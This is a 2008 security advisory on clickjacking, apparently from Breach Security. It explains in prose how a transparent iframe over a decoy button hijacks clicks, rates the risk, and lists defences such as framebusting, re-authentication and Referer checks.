Clickjacking

Friday, October 24, 2008

Priority: MEDIUM

Impact:
A malicious website can trick a user into performing complex actions on an innocent website, effectively hijacking the user's account for a limited time.

Resolution:
Clickjacking can only be solved by the browser vendors. However, these preventative actions can be taken now:

  1. Individual users should consider using the Mozilla Firefox browser with the NoScript plug-in installed.
  2. System administrators should be on the lookout for suspicious activity in user accounts.
  3. Where possible, websites should be upgraded to use framebusting.

Who:
Any organization with a website that allows users to have individual accounts is vulnerable, but those where the accounts protect something of high value—bank accounts, credit card numbers, health insurance records—are the most likely targets.

What:
Clickjacking is a new name, but the problem itself was known as early as 2002. However, the full impact of this issue has only come to light recently.

At the core of this problem is the ability of websites to display fragments of other websites within their own pages. Users cannot tell, without understanding the underlying code, which parts are from the actual website they are visiting and which are not. Although this ability is a security issue, it has long been an integral part of the Internet. Many websites use it for legitimate reasons.

A clickjacking attack is exactly what it sounds like: a click, on what a user thinks is a separate third-party website, is hijacked and actually turned into a click on a website where the user already has an account.

How:
A clickjacking attack can be executed in a number of slightly different ways. One method involves tricking an innocent user into clicking on a button on another website:

  1. Attackers create a web page that displays content from the target website with the button they want users to click. In HTML, this is done using an inline frame (iframe).
  1. The page is hidden by making the inline frame fully transparent. Although the frame can no longer be seen, its active content remains active. Users can still click on any button on that page, providing they know exactly where to click. The attackers know the exact coordinates of the button, so all they need to do is make a user click on that location.
  1. The attackers create their own button and position the button directly under the button on the target website. Because the real button is invisible, users only see the attacker’s button. When they click on what they think is a button on the attacker's site, they are actually clicking on the button on the target website, and the attack is successful.

Impact:
Although it is relatively easy to get users to do something without being aware of their actions, there are preconditions to the overall success of this attack:

  1. The attacker must get the user to the malicious website. This is typically done via email, social engineering or by (real) hijacking of popular websites.
  1. The attacker must be able to open the page on the target website. There are two obstacles to this:
  • In most cases, the victim must already be logged in to the target website.
  • Being on the right page may require a multi-step process, so it may not be possible to go to the target web page even if the user is already logged in. In this case, the attacker would have to mount a more complex attack, hijacking multiple clicks in order to lead the user through the process. It is not yet clear whether it is possible to hijack any interaction other than clicking. Even so, the overall complexity of this would make exploitation very difficult. Simple, multi-step interactions (for example, ask to delete something, then click on the Yes button to confirm the action) could be relatively straightforward to execute.

Some browser components, most notably the Adobe Flash plugin, can be relatively easy abused. Here, an attacker would target users directly to gain access to their workstations. Adobe has released an updated version of Flash, and it is recommended that all users upgrade as soon as they can.

Risk:
Attacks against users are easy to carry out because an exploit, once available in the wild, is easy to replicate on a number of malicious websites. Thus, the severity for Internet users is HIGH.

To organizations, clickjacking is a serious threat because it defeats the cross-site request forgery (CSRF) attacks that might already be in place. Because clickjacking attacks must be tailored to each specific target and the target's usage patterns need to be favorable in order to make attacks feasible, we are categorizing this as a MEDIUM severity issue.

Resolution:
Clickjacking is difficult to defend against because it is a client-side (browser) problem. Only a coordinated action of major browser vendors can ultimately fix this issue. In the meantime:

  1. Individual users should consider using the Mozilla Firefox browser with the NoScript plug-in installed. This combination is known to defeat clickjacking. It is not known at this time if other browser vendors have plans to address this issue.
  2. System administrators in charge of application security should be on the lookout for suspicious activity in user accounts (e.g. through real-time website monitoring).
  3. Website and web application developers should consider implementing one of the following options
  • Upgrading sites to use framebusting, a technique that prevents site pages from being used within frames on other websites.
  • Requiring users to re-authenticate for every significant action (e.g. money transfer)
  • Observing the Referrer request header to help detect the initial opening of a page in the context of another site or having the site not respond to such requests that fall into the areas of the site that are private, or do not contain the referrer information. This type of protection, however, cannot be used on pages that need to be publically accessible.

Contact
For more information on this alert, please email support@breach.com.